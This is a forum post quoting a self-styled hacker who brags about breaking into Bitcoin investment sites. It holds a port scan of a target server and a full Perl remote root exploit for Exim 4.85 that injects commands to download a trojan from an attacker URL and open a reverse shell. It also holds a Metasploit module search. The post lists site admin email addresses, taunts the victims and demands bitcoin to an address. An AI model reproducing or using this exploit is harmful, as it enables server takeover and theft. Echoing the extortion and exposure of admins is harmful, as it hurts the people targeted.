Latest posts of: EarnBtcFaucet

Look at this:

Quote from: 5m4ru1 on May 05, 2015, 02:27:40 AM

hehe i told u dont fucking play with me ! Kiss

where is u "ponzi" now ? Roll Eyes

some infos to public
http://pastebin.com/VGcARfGe

ORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
26/tcp closed rsftp
53/tcp open tcpwrapped
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open http nginx
465/tcp open ssl/smtp Exim smtpd 4.85
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL (unauthorized)
8080/tcp closed http-proxy

nice 465/tcp open ssl/smtp Exim smtpd 4.85 Shocked

code of exploit in perl:

Code:

#Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module

=for comment

use this connect back shell as "trojanurl" and be sure to setup a netcat,

---snip---

$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");

open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;

system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;

system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);

---snip---

=cut

use IO::Socket;

if ($#ARGV ne 3) {
        print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
        print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
        exit;
}

$|=1;

$trojan = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$helohost = "abcde.com";

$max_msg = 52428800;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "25",
                                 Proto    => 'tcp');

while(<$sock>) {
        print;
        if ($_ =~ /220 /) { last;}
}

print $sock "EHLO $helohost\r\n";
while(<$sock>) {
        print;
        if ($_ =~ /250-SIZE (\d+)/) {
                $max_msg = $1;
                print "Set size to $max_msg !\n";
        }
        if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) {
                $revdns = $1;
                $saddr = $2;
        }
        if ($_ =~ /250 /) { last;}
}

if ($revdns eq $helohost) {
        $vv = "";
} else {
        $vv = $revdns. " ";
}

$vv .= "(" . $helohost . ")";

$from = "root\@local.com";
$to = "postmaster\@localhost";

$msg_len = $max_msg + 1024*256;
$logbuffer_size = 8192;

$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n";
$logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";

$filler = "V" x (8 * 16);
$logbuffer_size -= 3;

for ($k=0;$k<60;$k++) {
if (length($logbuffer) >= $logbuffer_size) {last;}
$hdr = sprintf("Header%04d: %s\n", $k, $filler);
$newlen = length($logbuffer) + length($hdr);
if ($newlen > $logbuffer_size) {
        $newlen -= $logbuffer_size;
        $off = length($hdr) - $newlen - 2 - 1;
        $hdr = substr($hdr, 0, $off);
        $hdr .= "\n";
}
$hdrs .= $hdr;
$logbuffer .= "  " . $hdr;
}

$hdrx = "HeaderX: ";
$k2 = 3;
for ($k=1;$k<=200;$k++) {
        if ($k2 > 12) {
                $k2 = 3;
        }
#        $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} ";
        $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
        $k2++;
}

$v = "A" x 255 . "\n";
$body = "";
while (length($body) < $msg_len) {
        $body .= $v;
}

$body = substr($body, 0, $msg_len);

print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";
$v = <$sock>;
print $v;
print $sock "DATA\r\n";
$v = <$sock>;
print $v;

print "Sending large buffer, please wait...\n";

print $sock $hdrs;
print $sock $hdrx . "\n";
print $sock $body;
print $sock "\r\n.\r\n";
$v = <$sock>;
print $v;
print $sock "MAIL FROM: <$from>\r\n";
$v = <$sock>;
print $v;
print $sock "RCPT TO: <$to>\r\n";

while(1){};

msf core...

Code:

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            http://metasploit.pro


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search Exim
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/linux/smtp/exim4_dovecot_exec  2015-01-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
   exploit/unix/smtp/exim4_string_format  2013-12-07       excellent  Exim4 string_format Function Heap Buffer Overflow

msf >

some screenshot

some problem if u have i cant windraw all here Grin

admin@money10.net
admin@14daily.com
admin@bitcoinfield.net
admin@profit12.com
admin@lucrebit.com

wellcome speedy1987 in me world
dont sarching me i have 20 firewole 10 nat and 5 vps hahah.
now u all cant windraw u monet but if u dont have skills...
this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !
pozdrowienia ! polish elite hacker team Kiss